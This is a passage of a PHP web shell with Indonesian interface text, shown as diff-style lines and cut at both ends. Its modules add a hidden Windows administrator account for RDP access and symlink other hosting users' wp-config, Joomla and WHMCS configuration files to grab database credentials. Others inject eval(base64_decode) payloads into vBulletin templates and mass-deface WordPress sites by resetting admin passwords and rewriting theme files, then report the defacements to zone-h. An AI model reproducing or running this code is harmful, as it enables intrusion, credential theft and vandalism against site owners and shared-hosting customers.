- echo "$row/$file > Done<br><br>";
- }
- }
- }
- ///menu rdp
- if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
- {
- if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
- {<br/><br/>
- <center>
- <h1>RDP Creator By Shor7cut</h1>
- <div id="content-left">
- <form action="" method="post">
- <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
- <tr>
- <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
- </tr>
- <tr>
- <td><font class='kecew'>Username</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" class="bordergaya" name="username" required></td>
- </tr>
- <tr>
- <td><font class='kecew'>Password</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" class="bordergaya" name="password" required></td>
- </tr>
- <tr>
- <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
- </tr>
- </table>
- </form>
- </div>
- <br/>
- <div id="content-left">
- <form action="" method="post">
- <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
- <tr>
- <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
- </tr>
- <tr>
- <td><font class='kecew'>Username</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
- </tr>
- <tr>
- <td><font class='kecew'>Password</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
- </tr>
- <tr>
- <td><font class='kecew'>Action</font></td>
- <td><font class='kecew'> : </font></td>
- <td>
- <select name="aksi" class="bordergaya">
- <option value="1">Tampilkan Username</option>
- <option value="2">Hapus Username</option>
- <option value="3">Ubah Password</option>
- </select>
- </td>
- </tr>
- <tr>
- <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
- </tr>
- </table>
- </form>
- <br/>
- </div>
- </center></center>
- if($_POST['submit'])
- {
- if($_POST['kshell']=="1")
- {
- $r_user = $_POST['username'];
- $r_pass = $_POST['password'];
- $cmd_cek_user = shell_exec("net user");
- if(preg_match("/$r_user/", $cmd_cek_user)){
- echo $gaya_root.$r_user." sudah ada".$o;
- }else {
- $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
- $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
- $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
- $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
- if($cmd_add_user){
- echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
- }else {
- echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
- }
- echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
- if($cmd_add_groups1){
- echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
- }else
- if($cmd_add_groups2){
- echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
- }else
- if($cmd_add_groups3){
- echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
- }else {
- echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
- }
- echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
- echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
- echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
- }
- }
- else if($_POST['kshell']=="2")
- {
- echo "<style>
- .coeg{margin-left:30%;}
- </style>";
- if($_POST['aksi']=="1"){
- echo "<pre class='coeg'>".shell_exec("net user");
- }
- else if($_POST['aksi']=="2")
- {
- $username = $_POST['rusername'];
- $cmd_cek_user = shell_exec("net user");
- if (!empty($username)){
- if(preg_match("/$username/", $cmd_cek_user)){
- $cmd_add_user = shell_exec("net user ".$username." /DELETE");
- if($cmd_add_user){
- echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
- echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
- }else {
- echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
- }
- }else {
- echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
- }
- }else {
- echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
- }
- }
- else if($_POST['aksi']=="3")
- {
- echo "<style>
- .tengahaja{margin-left:35%}
- </style>";
- $username = $_POST['rusername'];
- $password = $_POST['gantipw'];
- $cmd_cek_user = shell_exec("net user");
- if (!empty($username)){
- if(preg_match("/$username/", $cmd_cek_user)){
- $cmd_add_user = shell_exec("net user ".$username."");
- if($cmd_add_user){
- echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
- }else {
- echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
- }
- }else
- {
- echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
- }
- }else
- {
- echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
- }
- }
- }
- }
- } else{
- echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
- }die();
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'hostg')) {
- echo $bencong . "<center><p class='font-effect-shadow-multiple' style=font-family:Ubuntu;font-size:25px;color:#58FAF4;><b>Symlink HostGator Server ('.ini') Extension Method</b></p>";<center><img src="http://www.taylorclark.co/wp-content/uploads/2013/06/Hostgator-VS-Amazon.jpg"></center><center><form method=post><font color=#58FAF4 size=2 face="Courier New">Get users (etc/passwd) for symlink ^_^</font><p><input type=submit name="hostg" value="Extract usernames" /></form></center> if (isset($_POST['hostg'])) {<form method=post><textarea rows=10 cols=50 name=user>$users = file("/etc/passwd");
- foreach ($users as $user) {
- $str = explode(":", $user);
- echo $str[0] . "\n";
- }</textarea><br><br><input type=submit name=su value="Bypass HostGator Configs" /></form> }error_reporting(0);
- echo "<font color=#58FAF4 size=2 face=\"Courier New\">";
- if (isset($_POST['su'])) {
- mkdir('HostGator', 0755);
- $rr = " Options +FollowSymLinks \n DirectoryIndex Sux.html \n Options +Indexes \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain.html ";
- $g = fopen('HostGator/.htaccess', 'w');
- fwrite($g, $rr);
- $HostGator = symlink("/", "HostGator/root");
- $rt = "<a href=HostGator/root><font color=#ff0000 size=2 face=\"Courier New\"> Bypassed Successfully</font></a>";
- echo "Check link given below for / folder symlink <br><b>$rt</b>";
- mkdir('HostGator', 0755);
- $rr = " Safe_mode = OFF \n Disable_functions = NONE \n Open_basedir = OFF ";
- $g = fopen('HostGator/php.ini', 'w');
- fwrite($g, $rr);
- $HostGator = symlink("/", "HostGator/root");
- fwrite($f, $r);
- $consym = "<a href=HostGator/><font color=#ff0000 size=2 face=\"Courier New\">configuration files</font></a>";
- echo "<br><font color=#58FAF4 size=2 face=\"Courier New\">The link given below is for configs path symlink, If Forbidden you can view Configs inside the Source Code By Creating an shtml File and including virtual name of the config name Or Just Back Connect to the server and retrieve root manually ln -s / Good Chance ^_^ </font><br><b><font color=#58FAF4 size=2 face=\"Courier New\">$consym</font></b>";
- $usr = explode("\n", $_POST['user']);
- $configuration = array(
- "wp-config.ini",
- "wordpress/wp-config.ini",
- "configuration.ini",
- "blog/wp-config.ini",
- "joomla/configuration.ini",
- "vb/includes/config.ini",
- "includes/config.ini",
- "conf_global.ini",
- "inc/config.ini",
- "config.ini",
- "Settings.ini",
- "sites/default/settings.ini",
- "whm/configuration.ini",
- "whmcs/configuration.ini",
- "support/configuration.ini",
- "whmc/WHM/configuration.ini",
- "whm/WHMCS/configuration.ini",
- "whm/whmcs/configuration.ini",
- "support/configuration.ini",
- "clients/configuration.ini",
- "client/configuration.ini",
- "clientes/configuration.ini",
- "cliente/configuration.ini",
- "clientsupport/configuration.ini",
- "billing/configuration.ini",
- "admin/config.ini"
- );
- foreach ($usr as $uss) {
- $us = trim($uss);
- foreach ($configuration as $c) {
- $rs = "/home/" . $us . "/public_html/" . $c;
- $r = "HostGator/" . $us . " .. " . $c;
- symlink($rs, $r);
- }
- }
- }
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'grabc')) { @ini_set('output_buffering',0);
- echo "
- <form method='POST'>
- </head>
- <style>
- textarea{resize:none;color:#000;background-color:#000;font-size:8pt;color:#fff;border:1px solid white;border-left:4px solid white;width:543px;height:400px}input{color:#000;border:1px dotted white}
- </style>";
- echo "<center>";</center><br><center>if (empty($_POST['config'])) {<p><font face="Cabin" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='inputz' rows='15' cols='60'>echo file_get_contents('/etc/passwd');</textarea><br><br><input name="config" class='inputz' size="100" value="Grab!" type="submit"><br></form></center><br>}if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Sad-Conf', 0755);@chdir('Sad-Conf');
- $htaccess="
- OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
- Options Indexes FollowSymLinks
- ForceType text/plain
- AddType text/plain .php
- AddType text/plain .html
- AddType text/html .shtml
- AddType txt .php
- AddHandler server-parsed .php
- AddHandler txt .php
- AddHandler txt .html
- AddHandler txt .shtml
- Options All
- Options All";
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
- $passwd=explode("\n",$passwd);
- echo "<br><br><center><font face='cabin' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>";
- foreach($passwd as $pwd){
- $pawd=explode(":",$pwd);$user =$pawd[0];
- @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
- @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
- @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
- @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
- @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
- @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
- @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
- @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
- @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
- @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
- @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
- @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
- @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
- @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
- @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
- @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
- @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
- @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
- @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
- @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
- @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
- @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
- @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
- @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
- @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
- @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
- @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
- @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
- @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
- @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
- @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
- @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
- @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
- @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
- echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bro Monggo >></b> <a target="_blank" href="Sad-Conf">Hajar Config</a></font></b>';}
- die();
- }
- /////// Cukup Sampai Disini ya Grabber :( ////////
- elseif (isset($_GET['x']) && ($_GET['x'] == 'vb')) {
- if (empty($_POST['index'])) {
- echo "<center><br><br><FORM method='POST'>host : <INPUT size='15' class='inputz' value='localhost' name='localhost' type='text'> | database : <INPUT class='inputz' size='15' value='db_name' name='database' type='text'> | username : <INPUT class='inputz' size='15' value='db_user' name='username' type='text'> | password : <INPUT class='inputz' size='15' value='bd_pass' name='password' type='text'> | perfix : <input class='inputz' size='15' value='' name='perfix' type='text'><br><textarea class='inputz' name='index' cols='40' rows='10'>Hacked By CyberTeamRox</textarea><br><INPUT class='inputzbut' value='Deface' name='send' type='submit'></FORM></center>";
- } else {
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $perfix = $_POST['perfix'];
- $index = $_POST['index'];
- @mysql_connect($localhost, $username, $password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $index = str_replace("\'", "'", $index);
- $set_index = "{\${eval(base64_decode(\'";
- $set_index .= base64_encode("echo '$index';");
- $set_index .= "\'))}}{\${exit()}}</textarea>";
- $ok = @mysql_query("UPDATE " . $perfix . "template SET template ='" . $set_index . "' WHERE title ='FORUMHOME'") or die(mysql_error());
- if ($ok) {
- echo "Defaced<br><br>";
- }
- }
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'wm')) {
- ini_set("display_errors", "0");
- set_time_limit(0);
- @session_start();
- $base_path = dirname(__FILE__) . '/';
- function entre2v2($text, $marqueurDebutLien, $marqueurFinLien, $i = 1)
- {
- $ar0 = explode($marqueurDebutLien, $text);
- $ar1 = explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- function randomt()
- {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double) microtime() * 1000000);
- $i = 0;
- $pass = '';
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- function index_changer_wp($conf, $content)
- {
- $output = '';
- $dol = '$';
- $username = entre2v2($conf, "define('DB_USER', '", "');");
- $password = entre2v2($conf, "define('DB_PASSWORD', '", "');");
- $dbname = entre2v2($conf, "define('DB_NAME', '", "');");
- $prefix = entre2v2($conf, $dol . "table_prefix = '", "'");
- $host = entre2v2($conf, "define('DB_HOST', '", "');");
- $link = mysql_connect($host, $username, $password);
- if ($link) {
- mysql_select_db($dbname, $link);
- $dol = '$';
- $req1 = mysql_query("UPDATE `" . $prefix . "users` SET `user_login` = 'k2',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
- } else {
- $output .= "[-] DB Error<br>";
- }
- if ($req1) {
- $req = mysql_query("SELECT * from `" . $prefix . "options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url = $data["option_value"];
- $req = mysql_query("SELECT * from `" . $prefix . "options` WHERE option_name='template'");
- $data = mysql_fetch_array($req);
- $template = $data["option_value"];
- $req = mysql_query("SELECT * from `" . $prefix . "options` WHERE option_name='current_theme'");
- $data = mysql_fetch_array($req);
- $current_theme = $data["option_value"];
- $useragent = "Mozilla/4.0 (compatible;MSIE 7.0b;Windows NT 5.1;.NET CLR 1.1.4322;Alexa Toolbar;.NET CLR 2.0.50727)";
- $url2 = $site_url . "/wp-login.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "log=k2&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos = strpos($buffer, "action=logout");
- if ($pos === false) {
- $output .= "[-] Successful Login<br>";
- } else {
- $output .= "[+] Successful Login<br>";
- }
- $url2 = $site_url . "/wp-admin/theme-editor.php?file=/themes/" . $template . '/index.php&theme=' . urlencode($current_theme) . '&dir=theme';
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- $_wpnonce = entre2v2($buffer0, '<input type="hidden" id="_wpnonce" name="_wpnonce" value="', '" />');
- $_file = entre2v2($buffer0, '<input type="hidden" name="file" value="', '" />');
- if (substr_count($_file, "/index.php") != 0) {
- $output .= "[+] index.php Opened<br>";
- } else {
- $output .= "[-] index.php Unable to open<br>";
- }
- $url2 = $site_url . "/wp-admin/theme-editor.php";
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "newcontent=" . $content . "&action=update&file=" . $_file . "&_wpnonce=" . $_wpnonce . "&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- curl_close($ch);
- $pos = strpos($buffer, '<div id="message" class="updated">');
- $cond = 0;
- if ($pos === false) {
- $output .= "[-] index.php Failed<br>";
- } else {
- $output .= "[+] index.php Failed+<br>";
- $cond = 1;
- }
- } else {
- $output .= "[-] DB Error<br>";
- }
- global $base_path;
- unlink($base_path . 'COOKIE.txt');
- return array(
- 'cond' => $cond,
- 'output' => $output
- );
- }
- function exec_mode_1($def_url)
- {
- @mkdir('sym', 0777);
- $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $fp = @fopen('sym/.htaccess', 'w');
- fwrite($fp, $wr);
- @symlink('/', 'sym/root');
- $dominios = @file_get_contents("/etc/named.conf");
- @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
- $out[1] = array_unique($out[1]);
- $numero_dominios = count($out[1]);
- echo "Total Websites: $numero_dominios <br><br>";
- $def = file_get_contents($def_url);
- $def = urlencode($def);
- $base_url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/sym/root/home/';
- $output = fopen('defaced.html', 'a+');
- $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st'] != '') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] : 0) : 0;
- $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st'] != '') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] : 0) : 0;
- echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Script</th><th>Process</th><th>Results</th></tr>';
- $j = 1;
- $st = (isset($_GET['st']) && $_GET['st'] != '') ? $_GET['st'] : 0;
- for ($i = $st; $i <= $numero_dominios; $i++) {
- $domain = $out[1][$i];
- $dono_arquivo = @fileowner("/etc/valiases/" . $domain);
- $infos = @posix_getpwuid($dono_arquivo);
- $config02 = @file_get_contents($base_url . $infos['name'] . "/public_html/wp-config.php");
- $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
- if ($config02 && preg_match('/DB_NAME/i', $config02)) {
- echo '<tr ' . $cls . '><td align="center">' . ($j++) . '</td><td align="center">' . $i . '</td><td><a href="http://' . $domain . '" target="blank">' . $domain . '</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config02, $def);
- echo '<td>' . $res['output'] . '</td>';
- if ($res['cond']) {
- echo '<td align="center"><span class="green">HACKED</span></td>';
- fwrite($output, 'http://' . $domain . "<br>");
- $_SESSION['count2'] = $_SESSION['count2'] + 1;
- } else {
- echo '<td align="center"><span class="red">unsuccessful</span></td>';
- }
- echo '</tr>';
- }
- }
- echo '</table>';
- echo '<hr/>';
- echo 'Total Deface = ' . ($_SESSION['count1'] + $_SESSION['count2']) . '<br>';
- echo '<a href="defaced.html" target="_blank">List Websites Defaced</a><br>';
- }
- echo '<head><p><h2 style="color:#FF0000;text-align: center;font-family:orbitron;font-size:25px;">Wordpress Mass Defacer</h2><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">body {color: white;font-family: "orbitron";}.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}</style></p><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';} }function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><div class="footer"><a href="https://facebook.com/Krypton" target="_blank"><h3 style="text-align: center;">' . base64_decode('S3J5cHRvbg==') . '</h3></a></div><div>';
- if (!isset($_POST['form_action'])) {
- echo '<div align="center"><center><img class="HoverBorder" alt="" src="http://data.whicdn.com/images/109178420/large.jpg";' . $tunisia . '" /></center><form action="" method="post"><input type="hidden" name="form_action" value="1"><br>index url:<input class="inputz" type="text" name="indexadresi" size="30" value="http://site.com/index.html" /><br><br><input class="inputzbut" type="submit" value="Deface" name="Submit"></form> </div>';
- }
- echo '<div align="center">';
- if ($_POST['form_action'] == 1) {
- exec_mode_1($_POST['indexadresi']);
- }
- echo '</div></div></body></html>';
- } elseif (isset($_GET['x']) && ($_GET['x'] == 'zone-h')) {
- $defacer = 'Krypton';
- $display_details = 0;
- $method = 14;
- $reason = 5;
- error_reporting(0);
- set_time_limit(0);
- if (!function_exists('curl_init')) {
- echo "CURL ERROR\n";
- exit;
- }
- $cli = (isset($argv[0])) ? 1 : 0;
- if ($cli == 1) {
- $file = $argv[1];
- $sites = file($file);
- if (!file_exists($file)) {
- echo "<br><br><center><h1>error !</h1></center>\n";
- exit;
- }
- } else {
- if (function_exists(apache_setenv)) {
- @apache_setenv('no-gzip', 1);
- }
- @ini_set('zlib.output_compression', 0);
- @ini_set('implicit_flush', 1);
- @ob_implicit_flush(true);
- @ob_end_flush();
- if (isset($_POST['domains'])) {
- $sites = explode("\n", $_POST['domains']);
- }
- if (file_exists($_FILES["file"]["tmp_name"])) {
- $file = $_FILES["file"]["tmp_name"];
- $sites = file($file);
- }
- echo <<<EOF
- <div align="center"><table width="67%"><tr><td align=center></td></tr></table><br><pre>
- EOF;
- if (!isset($_POST['defacer'])) {
- echo <<<EOF
- <form enctype="multipart/form-data" method="POST"><div align='center'><span lang='en-us'><b>Defacer :</b></span><input class='inputz' name="defacer" type="text" value="$defacer" /><br/><table width='55%'><tr><td align='center'><span lang='en-us'><b>Domains:</b></span><p align='center'> <textarea rows='30' name='domains' cols='50' class='inputz'></textarea><br/><span lang='en-us'><b>OR</b></span><br/>Submit form .txt file:<br/><input name="file" type="file" /><br><br/><br/><input class='inputzbut' type='submit' value=' Send ' name='submit'></p></td></tr></table></form>
- EOF;
- }
- $defacer = $_POST['defacer'];
- }
- if (!$sites) {
- echo '</pre>';
- exit;
- }
- $sites = array_unique(str_replace('http://', '', $sites));
- $total = count($sites);
- echo "[+] Total unique domain: $total\n\n";
- $pause = 10;
- $start = time();
- $main = curl_multi_init();
- for ($m = 0; $m < 3; $m++) {
- $http[] = curl_init();
- }
- for ($n = 0; $n < $total; $n += 30) {
- if ($display_details == 1) {
- for ($x = 0; $x < 30; $x++) {
- echo '[+] Adding ' . rtrim($sites[$n + $x]) . '';
- echo "\n";
- }
- }
- $d = $n + 30;
- if ($d > $total) {
- $d = $total;
- }
- echo "=====================>[$d/$total]\n";
- for ($w = 0; $w < 3; $w++) {
- $p = $w * 10;
- if (!(isset($sites[$n + $p]))) {
- $pause = $w;
- break;
- }
- $posts[$w] = "defacer=$defacer&domain1=http%3A%2F%2F" . rtrim($sites[$n + $p]) . "&domain2=http%3A%2F%2F" . rtrim($sites[$n + $p + 1]) . "&domain3=http%3A%2F%2F" . rtrim($sites[$n + $p + 2]) . "&domain4=http%3A%2F%2F" . rtrim($sites[$n + $p + 3]) . "&domain5=http%3A%2F%2F" . rtrim($sites[$n + $p + 4]) . "&domain6=http%3A%2F%2F" . rtrim($sites[$n + $p + 5]) . "&domain7=http%3A%2F%2F" . rtrim($sites[$n + $p + 6]) . "&domain8=http%3A%2F%2F" . rtrim($sites[$n + $p + 7]) . "&domain9=http%3A%2F%2F" . rtrim($sites[$n + $p + 8]) . "&domain10=http%3A%2F%2F" . rtrim($sites[$n + $p + 9]) . "&hackmode=" . $method . "&reason=" . $reason . "&submit=Send";
- $curlopt = array(
- CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',
- CURLOPT_RETURNTRANSFER => true,
- CURLOPT_FOLLOWLOCATION => true,
- CURLOPT_ENCODING => true,
- CURLOPT_HEADER => false,
- CURLOPT_HTTPHEADER => array(
- "Keep-Alive: 7"
- ),
- CURLOPT_CONNECTTIMEOUT => 3,
- CURLOPT_URL => 'http://www.zone-h.com/notify/mass',
- CURLOPT_POSTFIELDS => $posts[$w]
- );
- curl_setopt_array($http[$w], $curlopt);
- curl_multi_add_handle($main, $http[$w]);
- }
- $running = null;
- do {
- curl_multi_exec($main, $running);
- } while ($running > 0);
- for ($m = 0; $m < 3; $m++) {
- if ($pause == $m) {
- break;
- }
- curl_multi_remove_handle($main, $http[$m]);
- $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
- if ($code != 200) {
- while (true) {
- echo ' [-]Error!....Retrying';
- echo "\n";
- sleep(5);
- curl_exec($http[$m]);
- $code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
- if ($code == 200) {
- break 1;
- }
- }
- }
- }
- }
- $end = time() - $start;
- echo 'Done';
- echo "\n\n[*]Time: $end seconds\n";
- curl_multi_close($main);
- if ($cli == 0) {
- echo '</pre></body></html>';
- }
- exit;
- }
- elseif (isset($_GET['x']) && ($_GET['x'] == 'about')) {
